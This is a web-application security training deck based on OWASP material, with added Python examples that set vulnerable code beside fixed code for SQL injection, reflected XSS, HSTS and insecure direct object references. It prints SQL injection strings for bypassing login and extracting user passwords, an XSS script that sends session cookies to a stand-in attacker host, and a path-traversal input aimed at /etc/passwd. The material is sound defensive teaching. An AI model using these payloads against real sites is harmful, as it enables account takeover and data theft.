Copyright (c) Björn Kimminich / @bkimminich
“Nobody would bother to hack us.”
“Our network firewall will keep us safe.”
“We have tests for all our use cases.”
“We will add security to the system later.”
“What's the worst that could happen?”
Vulnerability: a flaw or weakness in system security procedures, design, implementation, or internal controls that could [...] result in a security breach or a violation of the system's security policy.
Exploit: a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized).
You go to court and write your name as "Michael, you are now free to go".
The judge then says "Calling Michael, you are now free to go" and the bailiffs let you go, because hey, the judge said so.
// Vulnerable: the request parameters are concatenated straight into the SQL text,
// so quotes and comment markers in them become SQL syntax
String query = "SELECT id FROM users " +
"WHERE name = '" + req.getParameter("username") + "' " +
"AND password = '" + req.getParameter("password") + "'";
Generates queries like this:
SELECT id FROM users WHERE name = 'bjoern' AND password = 'secret'
Disabling password check for a known username:
SELECT id FROM users WHERE name = 'bjoern'--' AND password = '?'
Logging in without even knowing a username:
SELECT id FROM users WHERE name = '' or 1=1--' AND password = '?'
// Vulnerable: same pattern, this time inside a LIKE clause
String query =
"SELECT * FROM books " +
"WHERE title LIKE '%" + req.getParameter("query") + "%'";
Generates queries like this:
SELECT * FROM books WHERE title LIKE '%tangled web%'
SELECT * FROM books WHERE title LIKE '%'
UNION SELECT * FROM users--%'
Probing for the right number of result set columns:
SELECT * FROM books WHERE title LIKE '%'
UNION SELECT 1 FROM users--%'
SELECT * FROM books WHERE title LIKE '%'
UNION SELECT 1,2 FROM users--%'
SELECT * FROM books WHERE title LIKE '%'
UNION SELECT 1,2,3 FROM users--%'
Using known/guessed column names to extract data:
SELECT * FROM books WHERE title LIKE '%'
UNION SELECT name,email,password FROM users--%'
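Added here as a worked example (not code from the original slides): both concatenated queries above, run against an in-memory SQLite database so the injected strings can be watched doing their work, next to the parameterised form that stops them. The user and book rows are constructed sample data, and passwords sit in the table in clear only to mirror the slide's query shape; footnote 2 below covers how they should really be stored.

```python
"""The login and book-search queries from the slides, vulnerable and fixed,
against SQLite.  Sample rows are constructed for this example."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed users/books tables using the column names the slides use."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, email TEXT, password TEXT);
        CREATE TABLE books(id INTEGER PRIMARY KEY, title TEXT, author TEXT);
        INSERT INTO users VALUES (1, 'bjoern', 'bjoern@example.org', 'secret');
        INSERT INTO users VALUES (2, 'admin', 'admin@example.org', 'hunter2');
        INSERT INTO books VALUES (1, 'The Tangled Web', 'Zalewski');
        INSERT INTO books VALUES (2, 'Web Application Hacker''s Handbook', 'Stuttard');
    """)
    return conn


def login_vulnerable(conn, username: str, password: str):
    """String concatenation as on the slide; returns the matched user id or None."""
    query = ("SELECT id FROM users WHERE name = '" + username
             + "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    """Placeholders: the driver passes the values separately from the SQL text,
    so quotes and '--' inside them are data, never syntax."""
    row = conn.execute("SELECT id FROM users WHERE name = ? AND password = ?",
                       (username, password)).fetchone()
    return row[0] if row else None


def search_vulnerable(conn, term: str):
    """The concatenated LIKE query from the books example."""
    return conn.execute("SELECT * FROM books WHERE title LIKE '%" + term + "%'").fetchall()


def search_safe(conn, term: str):
    """Parameterised.  '%' and '_' typed by the user still act as LIKE
    wildcards; that is a separate, non-injection concern handled with ESCAPE."""
    return conn.execute("SELECT * FROM books WHERE title LIKE ?",
                        ("%" + term + "%",)).fetchall()


def probe_column_count(conn, max_cols: int = 10):
    """The probing step from the slide: UNION SELECT 1, then 1,2, then 1,2,3 ...
    until the database stops rejecting the mismatched column count."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        try:
            search_vulnerable(conn, "' UNION SELECT " + cols + " FROM users--")
            return n
        except sqlite3.OperationalError:
            continue  # "SELECTs to the left and right of UNION do not have the same number of result columns"
    return None


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "bjoern'--", "?"))    # 1: password check commented out
    print(login_vulnerable(db, "' or 1=1--", "?"))   # 1: first row wins, no username needed
    print(login_safe(db, "' or 1=1--", "?"))         # None
    print(probe_column_count(db))                    # 3
    print(search_vulnerable(db, "' UNION SELECT name,email,password FROM users--"))
```

The probe loop is exactly what an attacker (or a scanner) does by hand against the search box: each failed guess is an error page, the first success tells them how many columns to fill in the data-extraction query that follows.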
Dear valued customer,
you might be intrerestred in our new special offer! We offer best quailty on the planet for the lowest price possible: Click here for special offer!
Bjorn (Chief Executive Officer)
http://bookwo.rm/titles/search?keywords=raspberry%20pi
Often the search terms are displayed above the results:
<%
String keywords = request.getParameter("keywords");
List<Book> results = titleSearchService.search(keywords.split(" "));
%>
<%-- Vulnerable: keywords is reflected into the page without HTML encoding --%>
There are <%=results.size()%> results for
your search terms <em><%=keywords%></em>
<table>
<% for (Book book : results) { %>
<%-- render each result as a table row --%>
<% } %>
</table>
Probing for XSS Vulnerability
<script>alert(1)</script>
Stealing User Session
<script>
new Image().src="http://my.evil-si.te/hijack.php?c="
+encodeURI(document.cookie);
</script>
Site Defacement
<script>
document.body.background="http://my.evil-si.te/image.jpg";
</script>
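Added here as a worked example (not the slides' own JSP): the search-term heading rendered the way the JSP above does it and with HTML entity encoding at the output point, plus a small parser-based check, written for this example, that reports which script elements a browser would actually execute. The payload is the session-stealing one from the slide; the surrounding markup is constructed. In the JSP itself the equivalent fix is to replace `<%=keywords%>` with `<c:out value="${param.keywords}"/>`, which escapes XML by default.

```python
"""Reflected XSS: raw reflection versus HTML-encoded output, checked with a parser."""
import html
from html.parser import HTMLParser

# The cookie-stealing payload from the slide, submitted as ?keywords=...
HIJACK = ('<script>new Image().src="http://my.evil-si.te/hijack.php?c="'
          '+encodeURI(document.cookie);</script>')


def heading_vulnerable(keywords: str, count: int) -> str:
    """Mirrors <em><%=keywords%></em>: the parameter is copied into the markup verbatim."""
    return f"There are {count} results for your search terms <em>{keywords}</em>"


def heading_safe(keywords: str, count: int) -> str:
    """Same heading with entity encoding applied where the value enters HTML.
    This is the right encoder for element content; attribute values, URLs and
    JavaScript strings each need their own context-specific encoding."""
    return (f"There are {count} results for your search terms "
            f"<em>{html.escape(keywords, quote=True)}</em>")


class ScriptCollector(HTMLParser):
    """Collects the bodies of <script> elements as the HTML parser sees them."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data


def script_bodies(markup: str) -> list:
    """Return the JavaScript that would run if this markup were rendered."""
    parser = ScriptCollector()
    parser.feed(markup)
    parser.close()
    return parser.scripts


if __name__ == "__main__":
    print(script_bodies(heading_vulnerable(HIJACK, 0)))  # the hijack script, ready to run
    print(script_bodies(heading_safe(HIJACK, 0)))        # []
    print(heading_safe(HIJACK, 0))                       # &lt;script&gt;... shown as text
```

The parser check is the useful part: it answers "would this execute?" rather than "does the string contain the word script?", which is also why a blocklist on the input side is the wrong fix and encoding on the output side is the right one.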
1. Serve an HSTS header from your site to protect against protocol downgrade attacks. Also consider applying to have your domain included in the HSTS preload list of Chromium.
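Added here as a worked example (not part of the slides): a checker for the Strict-Transport-Security response header value, the header footnote 1 refers to. A conforming value looks like `Strict-Transport-Security: max-age=31536000; includeSubDomains; preload`. The thresholds in the code are the Chromium preload list's submission requirements (max-age of at least one year, includeSubDomains and preload both present); the sample header values are constructed.

```python
"""Parse a Strict-Transport-Security header and report what keeps it from
being preload-eligible."""
from dataclasses import dataclass
from typing import Optional

ONE_YEAR = 31536000  # seconds; the minimum max-age the preload list accepts


@dataclass
class Hsts:
    max_age: int
    include_subdomains: bool
    preload: bool


def parse_hsts(header: Optional[str]) -> Optional[Hsts]:
    """RFC 6797 syntax: ';'-separated directives, names case-insensitive,
    unknown directives ignored.  Returns None if the header is absent or
    malformed, which is how a browser treats it too."""
    if header is None:
        return None
    max_age = None
    include_subdomains = preload = False
    for raw in header.split(";"):
        directive = raw.strip()
        if not directive:
            continue
        name, _, value = directive.partition("=")
        name = name.strip().lower()
        value = value.strip().strip('"')
        if name == "max-age":
            if not value.isdigit():
                return None  # max-age needs a delta-seconds value
            max_age = int(value)
        elif name == "includesubdomains":
            include_subdomains = True
        elif name == "preload":
            preload = True
    if max_age is None:
        return None  # max-age is mandatory; without it the header is ignored
    return Hsts(max_age, include_subdomains, preload)


def hsts_problems(header: Optional[str]) -> list:
    """Empty list means the header is preload-eligible."""
    parsed = parse_hsts(header)
    if parsed is None:
        return ["no valid Strict-Transport-Security header"]
    problems = []
    if parsed.max_age == 0:
        problems.append("max-age=0 removes the policy instead of setting one")
    elif parsed.max_age < ONE_YEAR:
        problems.append(f"max-age {parsed.max_age} is below one year ({ONE_YEAR})")
    if not parsed.include_subdomains:
        problems.append("includeSubDomains missing")
    if not parsed.preload:
        problems.append("preload missing")
    return problems


if __name__ == "__main__":
    # Constructed header values
    print(hsts_problems("max-age=31536000; includeSubDomains; preload"))  # []
    print(hsts_problems("max-age=300"))                                   # three findings
    print(hsts_problems(None))                                            # header missing
```

The reason preloading matters: a browser only learns the policy from a response it has already received over HTTPS, so the very first plain-http request to the site is still exposed to a downgrade. The preload list ships the policy inside the browser and closes that window.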
2. Best to avoid storing credentials at all. If you must, use only brute-force resistant algorithms for password hashing, preferably Argon2, the winner of the Password Hashing Competition.
How could we escalate our privileges here?
http://logistics-worldwi.de/showShipment?id=40643108
http://my-universi.ty/api/students/6503/exams/view
http://document-warehou.se/landingpage?content=index.html
“Security by obscurity”
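Added here as a worked example (not part of the slides): the two kinds of untrusted reference in the URLs above. The numeric ids (`showShipment?id=...`, `/students/6503/exams`) are handled first the way the URLs suggest, a lookup by id, and then with the ownership check that stops one user from walking through everyone else's records; the file name in `landingpage?content=index.html` gets a containment check so it can only name files inside the page directory. Records and paths are constructed.

```python
"""Insecure direct object references: lookup-by-id versus lookup-bound-to-caller,
and an unchecked file name versus one confined to its directory."""
from pathlib import Path


class NotFound(Exception):
    pass


class Forbidden(Exception):
    pass


# Constructed shipment records, keyed by the sequential id seen in the URL.
SHIPMENTS = {
    40643108: {"owner": "alice", "destination": "Hamburg"},
    40643109: {"owner": "bob", "destination": "Munich"},
}


def show_shipment_vulnerable(current_user: str, shipment_id: int) -> dict:
    """Only checks that the id exists: any logged-in user can walk the id space."""
    if shipment_id not in SHIPMENTS:
        raise NotFound(shipment_id)
    return SHIPMENTS[shipment_id]


def show_shipment_safe(current_user: str, shipment_id: int) -> dict:
    """The caller is part of the lookup, not an afterthought."""
    shipment = SHIPMENTS.get(shipment_id)
    if shipment is None or shipment["owner"] != current_user:
        # Same answer for "missing" and "not yours", so the response does not
        # confirm which ids exist.
        raise NotFound(shipment_id)
    return shipment


def resolve_content_vulnerable(name: str, base: str) -> Path:
    """?content=index.html joined onto the page directory with no check at all."""
    return Path(base) / name


def resolve_content_safe(name: str, base: str) -> Path:
    """Resolve the requested name (after URL decoding, which the framework has
    already done) and refuse anything that does not end up inside base."""
    root = Path(base).resolve()
    candidate = (root / name).resolve()  # collapses '..' and follows symlinks
    if root not in candidate.parents:
        raise Forbidden(name)
    return candidate


if __name__ == "__main__":
    print(show_shipment_vulnerable("bob", 40643108))  # alice's shipment, handed to bob
    try:
        show_shipment_safe("bob", 40643108)
    except NotFound:
        print("bob cannot see alice's shipment")
    print(resolve_content_vulnerable("../../etc/passwd", "/srv/pages"))
    try:
        resolve_content_safe("../../etc/passwd", "/srv/pages")
    except Forbidden:
        print("traversal refused")
```

The point of "security by obscurity" on the previous slide is that a long or random-looking id is not an authorisation check: the safe lookup above would be just as necessary if the shipment numbers were UUIDs, because the question is never "can they guess it" but "are they allowed to see it".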
Presentation created with reveal.js, The HTML Presentation Framework
Based on free material provided by OWASP, The Open Web Application Security Project
Background image based on Digital Shodan by sephiroth-kmfdm
Copyright (c) Björn Kimminich / @bkimminich
This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.